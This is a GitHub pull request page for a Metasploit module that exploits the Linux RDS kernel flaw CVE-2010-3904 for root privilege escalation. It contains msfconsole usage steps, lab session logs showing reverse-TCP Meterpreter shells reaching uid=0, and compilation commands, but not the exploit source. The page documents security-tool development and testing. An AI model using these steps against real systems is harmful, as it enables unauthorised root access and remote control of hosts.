Skip to content

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit#9966

Merged
bwatters-r7 merged 5 commits intorapid7:masterfrom
bcoles:rds_priv_esc
May 18, 2018
Merged

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit#9966
bwatters-r7 merged 5 commits intorapid7:masterfrom
bcoles:rds_priv_esc

Conversation

@bcoles
Copy link
Copy Markdown
Contributor

@bcoles bcoles commented May 3, 2018
edited by asoto-r7
Loading

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit.

    This module exploits a vulnerability in the rds_page_copy_user function
    in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
    to execute code as root (CVE-2010-3904).

    This module has been tested successfully on Fedora 13 (i686) with
    kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
    with kernel version 2.6.32-21-generic.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/local/rds_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Scenarios

msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@bwatters-r7 bwatters-r7 self-assigned this May 16, 2018
@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented May 17, 2018

Testing

Ubuntu 10.04 (Linux 2.6.32-21-generic)

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.132.178
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.132.178:59896) at 2018-05-17 11:27:22 -0500

meterpreter > sysinfo
Computer     : 192.168.132.178
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/rds_priv_esc 
msf5 exploit(linux/local/rds_priv_esc) > show options

Module options (exploit/linux/local/rds_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 exploit(linux/local/rds_priv_esc) > set lport 4512
lport => 4512
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4512 
[*] Writing '/tmp/.A2XgT.c' (7282 bytes) ...
[*] Writing '/tmp/.b9kLc1l' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 192.168.132.178
[*] Meterpreter session 2 opened (192.168.135.111:4512 -> 192.168.132.178:58416) at 2018-05-17 11:35:39 -0500
[+] Deleted /tmp/.A2XgT.c
[+] Deleted /tmp/.A2XgT
[+] Deleted /tmp/.b9kLc1l

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >

@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented May 17, 2018

@bcoles is there a reason you included the password in the first comment, but not in the docs? I did not use it and it is not shown as an option in standard or advanced options?

Also, since you're using a static binary, it would be nice to have compilation instructions in the markdown doc. I assume standard gcc will do it, but it is still nice to have. I'd like to land this today, so if you can't get to it today, I'll probably just add it when I land it unless you're passionate about it.

bwatters-r7
bwatters-r7 reviewed May 17, 2018
View reviewed changes
modules/exploits/linux/local/rds_priv_esc.rb Outdated
end

def exploit
if check != CheckCode::Appears
Copy link
Copy Markdown
Contributor

@bwatters-r7 bwatters-r7 May 17, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

So I hate unless as much as the next non-ruby dev, but you used it on line 115. Just an inconsistent nitpicky thing I noticed.

Copy link
Copy Markdown
Contributor Author

@bcoles bcoles May 17, 2018
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

if was copypasta from another module. I like unless.

Edit Fixed

@bcoles
Copy link
Copy Markdown
Contributor Author

bcoles commented May 17, 2018
edited
Loading

PASSWORD was copypasta from another PR. This module does not have a PASSWORD option.

Edit: Removed - [ ] set PASSWORD <PASSWORD> from PR description

@bcoles
Copy link
Copy Markdown
Contributor Author

bcoles commented May 17, 2018

Compilation is trivial. Provided binaries are cross-compiled with musl.

./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c 
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c

Although they probably should have also been stripped with -s.

@bcoles
Copy link
Copy Markdown
Contributor Author

bcoles commented May 18, 2018

I've performed the suggested modifications

@bwatters-r7 bwatters-r7 merged commit 6858a1c into rapid7:master May 18, 2018
bwatters-r7 added a commit that referenced this pull request May 18, 2018
@bwatters-r7
Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation …
294b263 
…exploit

Merge branch 'land-9966' into upstream-master
@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented May 18, 2018
edited by asoto-r7
Loading

Release notes

This PR adds a privilege escalation against the Reliable Datagram Sockets (RDS) protocol on Linux kernel versions 2.6.30 to 2.6.36-rc8.

@bcoles bcoles deleted the rds_priv_esc branch May 19, 2018 05:14
jmartin-tech pushed a commit that referenced this pull request May 21, 2018
@bwatters-r7 @jmartin-tech
Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation …
81368be 
…exploit

Merge branch 'land-9966' into upstream-master
@jschipp-r7 jschipp-r7 mentioned this pull request Jun 7, 2019
Merged
@gblomqvist gblomqvist mentioned this pull request Oct 19, 2020
Merged
5 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels

docs module

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@bcoles @bwatters-r7